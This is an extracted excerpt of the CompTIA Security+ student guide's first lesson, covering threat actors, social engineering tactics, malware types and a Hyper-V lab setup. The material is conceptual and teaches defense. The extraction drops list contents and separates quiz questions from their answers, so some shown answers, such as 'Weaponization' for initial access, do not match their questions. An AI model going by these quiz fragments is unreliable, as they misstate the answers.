Downloadable Official CompTIA Security+ Student Guide
Downloadable Official CompTIA Security+ Student Guide
Security+
Student Guide
2019 Update
Exam SY0-501
Acknowledgements
Notices
DISCLAIMER
While CompTIA, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain
links to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible
for the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any
concerns regarding such links or External Sites.
TRADEMARK NOTICES
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries. All
other product and service names used may be common law or registered trademarks of their respective proprietors.
COPYRIGHT NOTICE
Copyright © 2019 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the
software proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or
distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of
CompTIA, 3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
Topic D: Assess Security Posture with Vulnerability Scanning Software Tools...... 115
Topic D: Install and Configure a Secure Routing and NAT Infrastructure.. 315
Topic D: Install and Configure Data Loss Prevention (DLP) Systems........... 391
Lesson 11: Deploying Secure Host, Mobile, and Embedded Systems........ 439
Topic A: Implement Secure Hardware Systems Design.................................440
Solutions........................................................................................................... 705
Glossary............................................................................................................ 745
Index................................................................................................................. 779
CompTIA is a not-for-profit trade association with the purpose of advancing the interests of IT
professionals and IT channel organizations and its industry-leading IT certifications are an
important part of that mission. CompTIA's Security+ certification is a foundation-level certificate
designed for IT administrators with two years' experience whose job role is focused on system
security.
The CompTIA Security+ exam will certify the successful candidate has the knowledge and skills
required to install and configure systems to secure applications, networks, and devices; perform
threat analysis and respond with appropriate mitigation techniques; participate in risk mitigation
activities; and operate with an awareness of applicable policies, laws, and regulations.
The Official CompTIA® Security+® (Exam SY0-501): 2019 Update is the primary course you will need to
take if your job responsibilities include securing network services, devices, and traffic in your
organization. You can also take this course to prepare for the CompTIA Security+ (Exam SY0-501)
certification examination. In this course, you will build on your knowledge of and professional
experience with security fundamentals, networks, and organizational security as you acquire the
specific skills required to implement basic security services on any type of computer network.
This course can benefit you in two ways. If you intend to pass the CompTIA Security+ (Exam
SY0-501) certification examination, this course can be a significant part of your preparation. But
certification is not the only key to professional success in the field of computer security. Today's
job market demands individuals with demonstrable skills, and the information and activities in this
course can help you build your computer security skill set so that you can confidently perform your
duties in any security-related role.
Course Description
Target Student
This course is designed for information technology (IT) professionals who have networking and
administrative skills in Windows®-based Transmission Control Protocol/Internet Protocol (TCP/IP)
networks; familiarity with other operating systems, such as macOS®, Unix®, or Linux®; and who
want to further a career in IT by acquiring foundational knowledge of security topics or using
CompTIA Security+ as the foundation for advanced security certifications or career roles.
This course is also designed for students who are seeking the CompTIA Security+ certification and
who want to prepare for the CompTIA Security+ SY0-501 Certification Exam.
Prerequisites
To ensure your success in this course, you should have basic Windows user skills and a
fundamental understanding of computer and networking concepts.
CompTIA A+ and Network+ certifications, or equivalent knowledge, and six to nine months'
experience in networking, including configuring security parameters, are strongly recommended.
Students can obtain this level of skill and knowledge by taking any of the following Official
CompTIA courses:
The Official CompTIA® A+®: Core 1 (Exam 220-1001)
The Official CompTIA® A+®: Core 2 (Exam 220-1002)
The Official CompTIA® Network+® (Exam N10-007)
Note: The prerequisites for this course might differ significantly from the prerequisites for the
CompTIA certification exams. For the most up-to-date information about the exam prerequisites,
complete the form on this page: https://certification.comptia.org/training/exam-objectives.
Course Objectives
In this course, you will use fundamental security principles to install and configure
cybersecurity controls and participate in incident response and risk mitigation.
You will:
• Compare and contrast attacks.
• Compare and contrast security controls.
• Use security assessment tools.
• Explain basic cryptography concepts.
• Implement a public key infrastructure.
• Implement identity and access management controls.
• Manage access services and accounts.
• Implement a secure network architecture.
• Install and configure security appliances.
• Install and configure wireless and physical access security.
• Deploy secure host, mobile, and embedded systems.
• Implement secure network access protocols.
• Implement secure network applications.
• Explain risk management and disaster recovery concepts.
• Describe secure application development concepts.
• Explain organizational security concepts.
As You Review
Any method of instruction is only as effective as the time and effort you, the student,
are willing to invest in it. In addition, some of the information that you learn in class
may not be important to you immediately, but it may become important later. For this
reason, we encourage you to spend some time reviewing the content of the course
after your time in the classroom.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Taking advantage of the glossary, index, and table of contents, you can use
this book as a first source of definitions, background information, and summaries.
Course Icons
Watch throughout the material for the following visual cues.
LESSON INTRODUCTION
Security is a matter of understanding strategies for attack and defense. As an information security
professional, your responsibilities are likely to lie principally in defending assets, but to do this
effectively you must also understand how those assets are threatened. As a security professional,
you must be able to compare and contrast the types of attacks that are commonly attempted
against information systems. As the threat landscape is continually evolving, you must also be able
to identify sources of threat intelligence and research.
LESSON OBJECTIVES
In this lesson, you will:
• Discuss why security policies and procedures plus skilled information security professionals are
critical to protecting assets.
• Describe the attributes of different types of threat actors.
• Contrast types of social engineering and phishing attacks.
• Use Indicators of Compromise to identify types of malware.
Topic A
Compare and Contrast Information
Security Roles
To be successful and credible as a security professional, you should understand
security in business starting from the ground up. You should also know the key
security terms and ideas used by other security experts in technical documents and in
trade publications. Security implementations are constructed from fundamental
building blocks, just like a large building is constructed from individual bricks. This topic
will help you understand those building blocks so that you can use them as the
foundation for your security career.
INFORMATION SECURITY
Information security refers to the protection of available information or information
resources from unauthorized access, attack, theft, or data damage. Responsible
individuals and organizations must secure their confidential information. Due to the
presence of a widely connected business environment, data is now available in a
variety of forms such as digital media and print. Therefore, every bit of data that is
being used, shared, or transmitted must be protected to minimize business risks and
other consequences of losing crucial data.
There are three primary goals or functions involved in the practice of information
security.
• Prevention—personal information, company information, and information about
intellectual property must be protected. If there is a breach in security in any of
these areas, then the organization may have to put a lot of effort into recovering
losses. Preventing entities from gaining unauthorized access to confidential
information should be the number one priority of information security
professionals.
• Detection—detection occurs when a user is discovered trying to access
unauthorized data or after information has been lost. It can be accomplished by
investigating individuals or by scanning the data and networks for any traces left by
the intruder in any attack against the system.
• Recovery—when there is a disaster or an intrusion by unauthorized users, system
data can become compromised or damaged. It is in these cases that you need to
employ a process to recover vital data from a crashed system or data storage
devices. Recovery can also pertain to physical resources.
Security systems are designed to protect a company's assets. (Image by Dmitry Kalinovsky ©
123RF.com.)
DATA ASSETS
It is important to recognize what pieces of information are important. For example, the
plans for an automobile manufacturer's new model are obviously vital and must be
kept confidential, but other information may be important in less obvious ways. For
example, if an attacker obtains a company's organization chart, showing who works for
whom, the attacker has found out a great deal about that organization and may be
able to use that information to gain more.
Data can be essential to many different business functions:
It is important to recognize that information must be available. You could seal some
records in a safe and bury the safe in concrete; the records would be secure, but
completely inaccessible and for most purposes, completely useless. Some security
models and researchers identify other properties that secure systems should exhibit.
The most important of these is non-repudiation. Non-repudiation means that a
subject cannot deny doing something, such as creating, modifying, or sending a
resource. For example, a legal document, such as a will, must usually be witnessed
when it is signed. If there is a dispute about whether the document was correctly
executed, the witness can provide evidence that it was.
SECURITY POLICY
A security policy is a formalized statement that defines how security will be
implemented within an organization. It describes the means the organization will take
to protect the confidentiality, availability, and integrity of sensitive data and resources.
It often consists of multiple individual policies. The implementation of a security policy
to support the goals of the CIA triad might be very different for a school, a
multinational accountancy firm, or a machine tool manufacturer. However, each of
these organizations, or any other organization (in any sector of the economy, whether
profit-making or non-profit-making) should have the same interest in ensuring that its
employees, equipment, and data are secure against attack or damage.
1. The first step in establishing a security policy is to obtain genuine support for and
commitment to such a policy throughout the organization.
2. The next step is to analyze risks to security within the organization. Risks are
components, processes, situations, or events that could cause the loss, damage,
destruction, or theft of data or materials.
3. Having identified risks, the next step is to implement controls that detect and
prevent losses and procedures that enable the organization to recover from
losses (or other disasters) with minimum interruption to business continuity.
4. The "final" step in the process is to review, test, and update procedures
continually. An organization must ensure continued compliance with its security
policy and the relevance of that policy to new and changing risks.
Activity 1-1
Discussing Information Security Roles
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Non-repudiation.
An asset may have a simple market value, which is the cost of replacement. The
loss of an asset may expose a company to business continuity and legal
liabilities, however, which may greatly outweigh the market value.
5. What is an ISSO?
Topic B
Explain Threat Actor Types
EXAM OBJECTIVES COVERED
1.3 Explain threat actor types and attributes.
NIST uses the following definitions of vulnerability, threat, risk, and control:
• Vulnerability—a weakness that could be triggered accidentally or exploited
intentionally to cause a security breach. Examples of vulnerabilities include
improperly configured or installed hardware or software, delays in applying and
testing software and firmware patches, untested software and firmware patches,
the misuse of software or communication protocols, poorly designed network
architecture, inadequate physical security, insecure password usage, and design
flaws in software or operating systems, such as unchecked user input.
• Threat—the potential for a threat agent or threat actor (something or someone
that may trigger a vulnerability accidentally or exploit it intentionally) to "exercise" a
vulnerability (that is, to breach security). The path or tool used by the threat actor
can be referred to as the threat vector.
• Risk—the likelihood and impact (or consequence) of a threat actor exercising a
vulnerability.
• Control—a system or procedure put in place to mitigate risk.
Note: These definitions and more information on risk management are contained in
SP800-30 (https://nvlpubs.nist.gov/nistpubs/Legacy/SP/
nistspecialpublication800-30r1.pdf).
"script kiddies" are able to launch sophisticated cyber-attacks because the tools and
information with which to conduct them is now more widely available on the Internet.
A hacktivist group, such as Anonymous, WikiLeaks, or LulzSec, uses cyber weapons to
promote a political agenda. Hacktivists might attempt to obtain and release
confidential information to the public domain, perform Denial of Service (DoS)
attacks, or deface websites. Political, media, and financial groups and companies are
probably most at risk, but environmental and animal advocacy groups may target
companies in a wide range of industries.
Researchers such as FireEye report on the activities of organized crime and nation state actors.
(Screenshot used with permission from fireeye.com.)
INDICATORS OF COMPROMISE
Historically, a lot of security tools have depended on identification of malware
signatures. This type of signature-based detection is unlikely to work against
sophisticated adversary kill chains because the tools used by the attacker are less likely
to be identifiable from a database of known virus-type malware. Consequently,
cybersecurity procedures have moved beyond the use of such static anti-virus tools
(though they still have their place) to identify and correlate Indicators of Compromise
(IoC).
When classifying threats and understanding adversary behaviors, it is helpful to
consider the framework developed by MITRE in its Structured Threat Information
eXpression (STIX) white paper (https://standardscoordination.org/sites/default/
Social media analytics and OSINT software, such as Maltego, can aggregate and process the metadata
from multiple sites to build up surprisingly detailed pictures of companies and of user's interests, and
even their habits and geographic location at a particular point in time. (Screenshot used with
permission from paterva.com.)
Note: If an attacker is already thinking about covering their tracks, they will not use an
account that can be linked back to them to perform this type of reconnaissance. This
might mean the use of a public workstation, an anonymized proxy or VPN, or a
compromised host. Another approach is to use false credentials to set up a temporary
web server instance. There are also "bulletproof" hosting providers and ISPs that
specialize in providing "no questions asked, anonymity guaranteed" services.
Using the TOR browser to view the AlphaBay market, now closed by law enforcement. (Screenshot used
with permission from Security Onion.)
Some examples of threat intelligence feed providers and sources for threat reports,
alerts, and newsletters include:
• Alien Vault (https://www.alienvault.com/solutions/threat-intelligence)
• SecureWorks (https://www.secureworks.com/capabilities/counter-threat-unit)
• FireEye (https://www.fireeye.com/solutions/cyber-threat-intelligence-
subscriptions.html)
• Symantec (http://symantec.com/security-intelligence)
• Microsoft (https://www.microsoft.com/en-us/wdsi)
• DarkReading (https://www.darkreading.com)
• SANS (https://www.sans.org/newsletters)
Activity 1-2
Discussing Threat Actor Types
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Risk
2. True or false? Nation state actors primarily only pose a risk to other states.
3. Which of the following threat actors is primarily motivated by the desire for
social change?
Insiders
Hacktivists
Competitors
Organized crime
☐ Hacktivists
☐ Nation states
☐ Organized crime
☐ Competitors
A hacker has the skills and experience to devise new types of attack and attack
tools. A script kiddie lacks this skill and experience and is limited to using well-
known and documented attack methods and tools.
6. In which stage of the "kill chain" does a threat actor first gain access to a
resource on the target network?
Weaponization
8. Just about every employee at the IT services company 515 Support has some
sort of social networking presence, whether personal or professional. How
might an attacker use open source intelligence available on sites like
Facebook, Twitter, and LinkedIn, to aid in their attacks?
Answers will vary, but people often share a great deal of information on social
networking sites. If these profiles are public, the attacker can glean important
details about an employee's position, duties, and current projects. They may be
able to craft their attack to target employees who are particularly vulnerable.
Topic C
Compare and Contrast Social
Engineering Attack Types
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
2.3 Given a scenario, troubleshoot common security issues.
When you think about attacks against information systems, you might think most
about protecting the technological components of those systems. But people—the
system users—are as much a part of an information system as the technological
components; they have their own vulnerabilities, and they can be the first part of the
system to succumb to certain types of attacks. In this topic, you will compare and
contrast social engineering attacks—threats against the human factors in your
technology environment.
For technically oriented people, it can be easy to forget that one of the most important
components of information systems is the people using those systems. Computers and
technology do not exist in a vacuum; their only benefit comes from the way people use
them and interact with them. Attackers know this, and so they know that the people in
the system may well be the best target for attack. If you want to protect your
infrastructure, systems, and data, you need to be able to recognize this kind of attack
when it happens.
SOCIAL ENGINEERING
Adversaries can use a diverse range of techniques to compromise a security system. A
prerequisite of many types of attacks is to obtain information about the network and
security system. Social engineering (or "hacking the human") refers to means of
getting users to reveal confidential information. Typical social engineering attack
scenarios include:
• An attacker creates an executable file that prompts a network user for their user
name and password, and then records whatever the user inputs. The attacker then
emails the executable file to the user with the story that the user must double-click
the file and log on to the network again to clear up some logon problems the
organization has been experiencing that morning. After the user complies, the
attacker now has access to their network credentials.
• An attacker contacts the help desk pretending to be a remote sales representative
who needs assistance setting up remote access. Through a series of phone calls, the
attacker obtains the name/address of the remote access server and login
credentials, in addition to phone numbers for remote access and for accessing the
organization's private phone and voice-mail system.
• An attacker triggers a fire alarm and then slips into the building during the
confusion and attaches a monitoring device to a network port.
IMPERSONATION
Impersonation (pretending to be someone else) is one of the basic social engineering
techniques. The classic impersonation attack is for the social engineer to phone into a
department, claim they have to adjust something on the user's system remotely, and
get the user to reveal their password. For this attack to succeed, the approach must be
convincing and persuasive.
Social engineering is one of the most common and successful malicious techniques in
information security. Because it exploits basic human trust, social engineering has
proven to be a particularly effective way of manipulating people into performing
actions that they might not otherwise perform. To be persuasive, social engineering
attacks rely on one or more of the following principles.
FAMILIARITY/LIKING
Some people have the sort of natural charisma that allows them to persuade others to
do as they request. One of the basic tools of a social engineer is simply to be affable
and likable, and to present the requests they make as completely reasonable and
unobjectionable. This approach is relatively low-risk as even if the request is refused, it
is less likely to cause suspicion and the social engineer may be able to move on to a
different target without being detected.
CONSENSUS/SOCIAL PROOF
The principle of consensus or social proof refers to the fact that without an explicit
instruction to behave in a certain way, many people will act just as they think others
would act. A social engineering attack can use this instinct either to persuade the target
that to refuse a request would be odd ("That's not something anyone else has ever
said no to") or to exploit polite behavior (see Tailgating). As another example, an
attacker may be able to fool a user into believing that a malicious website is actually
legitimate by posting numerous fake reviews and testimonials praising the site. The
victim, believing many different people have judged the site acceptable, takes this as
evidence of the site's legitimacy and places their trust in it.
DUMPSTER DIVING
Dumpster diving refers to combing through an organization's (or individual's) garbage
to try to find useful documents (or even files stored on discarded removable media).
Note: Remember that attacks may be staged over a long period of time. Initial attacks
may only aim at compromising low-level information and user accounts, but this low-
level information can be used to attack more sensitive and confidential data and better
protected management and administrative accounts.
SHOULDER SURFING
Shoulder surfing refers to stealing a password or PIN (or other secure information) by
watching the user type it. Despite the name, the attacker may not have to be in close
proximity to the target—they could use high-powered binoculars or CCTV to directly
observe the target remotely.
LUNCHTIME ATTACK
Most authentication methods are dependent on the physical security of the
workstation. If a user leaves a workstation unattended while logged on, an attacker can
physically gain access to the system. This is often described as a lunchtime attack.
Most operating systems are set to activate a password-protected screen saver after a
defined period of no keyboard or mouse activity. Users should also be trained to lock
or log off the workstation whenever they leave it unattended.
TAILGATING
Tailgating is a means of entering a secure area without authorization by following
close behind the person that has been allowed to open the door or checkpoint. Like
tailgating, piggy backing is a situation where the attacker enters a secure area with an
employee's permission. For instance, an attacker might impersonate a member of the
cleaning crew and request that an employee hold the door open while they bring in a
cleaning cart or mop bucket. Alternatively, piggy backing may be a means of an insider
threat actor to allow access to someone without recording it in the building's entry log.
Another technique is to persuade someone to hold a door open, using an excuse, such
as "I've forgotten my badge/key."
Example phishing email—On the right, you can see the message in its true form as the mail client has
stripped out the formatting (shown on the left) designed to disguise the nature of the links.
Spear phishing refers to a phishing scam where the attacker has some information
that makes an individual target more likely to be fooled by the attack. The attacker
might know the name of a document that the target is editing, for instance, and send a
malicious copy, or the phishing email might show that the attacker knows the
recipient's full name, job title, telephone number, or other details that help convince
the target that the communication is genuine. A spear phishing attack directed
specifically against upper levels of management in the organization (CEOs and other
"big beasts") is sometimes called whaling. Upper management may also be more
vulnerable to ordinary phishing attacks because of their reluctance to learn basic
security procedures.
While email is one of the most common vectors for phishing attacks, any type of
electronic communication without a secure authentication method is vulnerable.
Vishing describes a phishing attack conducted through a voice channel (telephone or
VoIP, for instance). For example, targets could be called by someone purporting to
represent their bank asking them to verify a recent credit card transaction and
requesting their security details. It can be much more difficult for someone to refuse a
request made in a phone call compared to one made in an email. Similarly, SMiShing
refers to fraudulent SMS texts. Other vectors could include instant messaging (IM) or
social networking sites.
resolution, so that they are redirected from the genuine site to the malicious one. For
example, if mybank.com should point to the IP address 2.2.2.2, a pharming attack
would corrupt the name resolution process to make it point to IP address 6.6.6.6.
A watering hole attack is another type of directed social engineering attack. It relies
on the circumstance that a group of targets may use an unsecure third-party website.
For example, staff running an international e-commerce site might use a local pizza
delivery firm. If an attacker can compromise the pizza delivery firm's website, they may
be able to install malware on the computers of the e-commerce company's employees
and penetrate the e-commerce company systems.
Hoaxes, such as security alerts or chain emails, are another common social
engineering technique, often combined with phishing or pharming attacks. An email
alert or web pop-up will claim to have identified some sort of security problem, such as
virus infection, and offer a tool to fix the problem. The tool of course will be some sort
of Trojan application. Criminals will also use sophisticated phone call scams to try to
trick users into revealing login credentials or financial account details.
Activity 1-3
Discussing Social Engineering Attacks
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
False alarm.
False alarm.
3. Social engineering attempt or false alarm? The CEO of 515 Support needs to
get access to market research data immediately. You recognize her voice,
but a proper request form has not been filled out to modify the permissions.
She states that normally she would fill out the form and should not be an
exception, but she urgently needs the data.
False alarm.
If a user logs on then leaves a workstation unattended, the user's account can
be compromised by anyone able to physically access the workstation. Users
should always log off or lock the workstation before leaving it.
The different terms refer to the intended targets and the degree of
personalization used in the attack. Phishing is typically unfocused, relying on
sheer volume. Spear phishing is a campaign directed against a particular
company or individual, while whaling is directed against executives or other
senior staff.
Topic D
Determine Malware Types
EXAM OBJECTIVES COVERED
1.1 Given a scenario, analyze indicators of compromise and determine the type of
malware.
One of the most prevalent threats to computers today is malicious code. As a security
professional, you will likely have experience in dealing with unwanted software
infecting your systems. By identifying the various types of malware and how they
operate, you will be better prepared to fight their infection, or better yet, prevent them
from infecting your systems in the first place.
Malicious code is undesired or unauthorized software, or malware, that is placed into a
target system to disrupt operations or to redirect system resources for the attacker’s
benefit. In the past, many malicious code attacks were intended to disrupt or disable
an operating system or an application, or force the target system to disrupt or disable
other systems. More recent malicious code attacks attempt to remain hidden on the
target system, utilizing available resources to the attacker's advantage.
Potential uses of malicious code include launching Denial of Service attacks on other
systems; hosting illicit or illegal data; skimming personal or business information for
the purposes of identity theft, profit, or extortion; or displaying unsolicited
advertisements.
COMPUTER VIRUSES
A computer virus is a type of malware designed to replicate and spread from
computer to computer, usually by "infecting" executable applications or program code.
There are several different types of viruses and they are generally classified by the
different ways they can infect the computer (the vector).
• Boot sector viruses—attack the disk boot sector information, the partition table,
and sometimes the file system.
• Program viruses—sequences of code that insert themselves into another
executable program. When the application is executed, the virus code becomes
active. Executable objects can also be embedded or attached within other file types,
such as document formats like Microsoft Word (DOC), Portable Document Format
(PDF), and Rich Text Format (RTF).
• Script viruses—scripts are powerful languages used to automate OS functions and
add interactivity to web pages. Scripts are executed by an interpreter rather than
self-executing. Most script viruses target vulnerabilities in the interpreter. Note that
some document types, such as PDF, support scripting and have become a common
vector in the last few years.
• Macro viruses—use the programming features available in Microsoft Office
documents. Recent versions of Office enforce restrictions against enabling
potentially dangerous content by default, but some users may have disabled these
protections.
• Multipartite viruses—use both boot sector and executable file infection methods
of propagation.
What these types of viruses have in common is that they must infect a host file. That
file can be distributed through any normal means—on a disk, on a network, or as an
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 1: Comparing and Contrasting Attacks | Topic D
26 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
Unsafe attachment detected by Outlook's mail filter—The "double" file extension is an unsophisticated
attempt to fool any user not already alerted by the use of both English and German in the message
text. (Screenshot used with permission from Microsoft.)
Viruses are also categorized by their virulence. Some viruses are virulent because they
exploit a previously unknown system vulnerability (a "zero day" exploit); others employ
particularly effective social engineering techniques to persuade users to open the
infected file (an infected email attachment with the subject "I Love You" being one of
the best examples of the breed).
While the distinguishing feature of a virus is its ability to replicate by infecting other
computer files, a virus can also be configured with a payload that executes when the
virus is activated. The payload can perform any action available to the host process.
For example, a boot sector virus might be able to overwrite the existing boot sector, an
application might be able to delete, corrupt, or install files, and a script might be able
to change system settings or delete or install files.
COMPUTER WORMS
Worms are memory-resident viruses that replicate over network resources. A worm is
self-contained; that is, it does not need to attach itself to another executable file. They
typically target some sort of vulnerability in an application, such as a database server
or web browser. The primary effect of a worm infestation is to rapidly consume
network bandwidth as the worm replicates. A worm may also be able to crash an
operating system or server application (performing a Denial of Service attack). Also, like
viruses, worms can carry a payload that may perform some other malicious action,
such as installing a backdoor.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 1: Comparing and Contrasting Attacks | Topic D
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 27
SubSeven RAT. (Screenshot used with permission from Wikimedia Commons by CCAS4.0 International.)
The attacker must establish some means of secretly communicating with the
compromised machine (a covert channel). This means that the RAT must establish a
connection from the compromised host to a Command and Control (C2 or C&C) host
or network operated by the attacker. This network connection is usually the best way
to identify the presence of a RAT.
Backdoors can be created in other ways than infection by Trojan malware.
Programmers may create backdoors in software applications for testing and
development that are subsequently not removed when the application is deployed.
This is more likely to affect bespoke applications, but there have been instances of
backdoors and exploits in commercial software as well. Backdoors are also created by
misconfiguration of software or hardware that allows access to unauthorized users.
Examples include leaving a router configured with the default administrative password,
having a Remote Desktop connection configured with an unsecure password, or
leaving a modem open to receive dial-up connections.
Note: In this context, RAT can also stand for Remote Administration Tool.
Actual Keylogger is Windows software that can run in the background to monitor different kinds of
computer activity (opening and closing programs, browsing websites, recording keystrokes, and
capturing screenshots). (Screenshot used with permission from ActualKeylogger.com.)
Adware is any type of software or browser plug-in that displays commercial offers and
deals. Some adware may exhibit spyware-like behavior, however, by tracking the
websites a user visits and displaying targeted ads, for instance. The distinction
between adware and spyware is sometimes blurred. Generally speaking, if the user is
not able to give informed consent and/or the application cannot be uninstalled by
normal means, then it's spyware. If the user accepts the use of their data and the
program generally behaves like any other commercial software installation, then it's
adware. Of course, informed consent may involve reading a 30-page license
agreement. Also, adware does not necessarily require client-side software, as a website
may host user data-tracking software without the user’s awareness.
As well as the intrusive aspects, adware and spyware can have a negative impact on
performance and system stability, with consequent effects on user productivity.
ROOTKITS
Many Trojans cannot conceal their presence entirely and will show up as a running
process or service. Often the process image name is configured to be similar to a
genuine executable or library to avoid detection. For example, a Trojan may use the
filename "run32d11" to masquerade as "run32dll". To ensure persistence (running
when the computer is restarted), the Trojan may have to use a Registry entry, which
can usually be detected fairly easily.
A rootkit represents a class of backdoor malware that is harder to detect and remove.
Rootkits work by changing core system files and programming interfaces, so that local
shell processes, such as Explorer, taskmgr, or tasklist on Windows or ps or top on
Linux, plus port scanning tools, such as netstat, no longer reveal their presence (at
least, if run from the infected machine). They also contain tools for cleaning system
logs, further concealing the presence of the rootkit. The most powerful rootkits
operate in kernel mode, infecting a machine through a corrupted device driver or
kernel patch. A less effective type of rootkit operates in user mode, replacing key
utilities or less privileged drivers.
Note: Software processes can run in one of several "rings." Ring 0 is the most privileged
(it provides direct access to hardware) and so should be reserved for kernel processes
only. Ring 3 is where user mode processes run; drivers and I/O processes may run in Ring
1 or Ring 2. This architecture can also be complicated by the use of virtualization.
There are also examples of rootkits that can reside in firmware (either the computer
firmware or the firmware of any sort of adapter card, hard drive, removable drive, or
peripheral device). These can survive any attempt to remove the rootkit by formatting
the drive and reinstalling the OS. For example, the US intelligence agencies have
developed DarkMatter and QuarkMatter EFI rootkits targeting the firmware on Apple®
MacBook® laptops (https://pcworld.com/article/3179348/after-cia-leak-intel-
security-releases-detection-tool-for-efi-rootkits.html).
The crypto-malware class of ransomware attempts to encrypt data files on any fixed,
removable, and network drives. If the attack is successful, the user will be unable to
access the files without obtaining the private encryption key, which is held by the
attacker. If successful, this sort of attack is extremely difficult to mitigate, unless the
user has up-to-date backups of the encrypted files.
Ransomware uses payment methods, such as wire transfer, bitcoin, or premium rate
phone lines to allow the attacker to extort money without revealing his or her identity
or being traced by local law enforcement.
Some types of malware do not trigger automatically. Having infected a system, they
wait for a preconfigured time or date (time bomb) or a system or user event (logic
bomb). Logic bombs also need not be malware code. A typical example is a disgruntled
system administrator who leaves a scripted trap that runs in the event his or her
account is deleted or disabled. Anti-virus software is unlikely to detect this kind of
malicious script or program. This type of trap is also referred to as a mine.
Activity 1-4
Discussing Malware Types
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. While using your computer, an app window displays on your screen and tells
you that all of your files are encrypted. The app window demands that you
make an anonymous payment if you ever want to recover your data. You
close the app window and restart your computer, only to find that your
personal files are all scrambled and unreadable. What type of malware has
infected your computer?
Ransomware.
2. Checking your email over a period of a week, you notice something unusual:
the spam messages that you've been receiving all seem to be trying to sell
you something closely related to the websites you happened to visit that
day. For example, on Monday you visited a subscription news site, and later
that day you noticed a spam email that solicited a subscription to that very
news site. On Tuesday, you browsed to an online retailer in order to buy a
birthday gift for your friend. The same gift you were looking at showed up in
another spam email later that night. What type of malware has infected
your computer?
Spyware.
3. You open up your favorite word processing app. As it opens, a window pops
up informing you that an important file has just been deleted. You close the
word processing app and open up a spreadsheet app. The same thing
happens—another file is deleted. The problem continues to spread as you
open up several more apps and each time, a file is deleted. What type of
malware has infected your system?
Virus.
Activity 1-5
Exploring the Lab Environment
SCENARIO
In this activity, you will familiarize yourself with the systems you will be using in the
course activities.
Note: Activities may vary slightly if the software vendor has issued digital updates. Your
instructor will notify you of any changes.
settings page for the DC1 VM and locate options to adjust the system memory and network
settings.
a) Open Hyper-V Manager and then right-click the DC1 VM and select Settings.
b) Select Memory.
In some activities you may increase or decrease the amount of RAM allocated to a VM
depending on the HOST resources, the number of VMs that the activity requires, and
the usage of each VM in the activity.
Adjusting memory allocated to a VM. (Screenshot used with permission from Microsoft.)
c) Select Network Adapter.
In some activities, you will change the virtual switch that an adapter uses. As you can
see, this Windows VM is connected to the vLOCAL switch. Some VMs are configured
with more than one adapter. You will be learning about the topology of the switches
during the activities.
d) Expand Network Adapter then select Advanced Features.
This page shows you the adapter MAC address, which you may need to verify for
some activities. In some activities, you may need to check the Enable MAC address
spoofing box to allow pen testing tools to work properly.
You may also change the Mirroring mode setting between None, Source, and
Destination. Mirroring mode allows another VM to sniff the unicast packets addressed
to a remote interface (like a spanned port on a hardware switch).
e) Select Add Hardware.
If you are asked to add an extra network adapter, this is the menu to use. Most VMs
will work with the option Network Adapter. In some cases, though, you may be
asked to select Legacy Network Adapter.
f) Select Cancel.
Note that the VM has one or more checkpoints. These are used to reset the VM to its
starting conditions. Some activities may prompt you to create a checkpoint. Unless
instructed otherwise, apply the Initial Config checkpoint when starting an activity.
The Windows network contains a domain controller and member server both running
Windows Server 2016.
• DC1 is configured as the network's domain controller (DC). Normally, the DC role
should not be combined with other roles, but to minimize the number of VMs you
have to run, this machine is also configured as a DNS server and CA (certificate
authority) server. This VM is configured with a static IP address (10.1.0.1).
• MS1 is configured as a member server for running applications. It runs a DHCP
service to perform auto addressing for clients connecting to the network. It has
the web server IIS and the email server hMail installed. This VM is also configured
with a static IP address (10.1.0.2).
The Windows network also contains two workstation VMs running Windows 10 (PC1)
and Window 7 (PC2). Both of these VMs use the DHCP server on MS1 for automatic
address configuration (in the range 10.1.0.101—10.1.0.110).
Note: You will usually use the username 515support\Administrator or the
local account Admin to log on to the Windows PCs. Each user account uses
the password Pa$$w0rd (awful security practice, but it makes the activities
simpler for you to complete).
Note: If you leave Kali, it will screen lock. To restore the screen, you must drag
the privacy shader up, rather than just select it.
b) Take a few moments to familiarize yourself with the desktop. Some key points to note
are:
• The bar on the left, called the Dash, contains shortcuts to some of the
applications, notably Terminal, Files, Metasploit, Armitage, and Burp Suite.
• The cable icon in the top panel allows you to change network settings using the
Network Manager application.
• The power icon allows you to reboot and shut down the VM.
Gnome desktop in the KALI VM. Use the Dash to open applications and the menu bar to
configure settings such as the network interface. (Screenshot used with permission from
Offensive Security.)
c) Right-click the desktop and select Open Terminal. Run ip a to check the network
adapter configuration.
Note: Remember that the Linux command-line is case-sensitive.
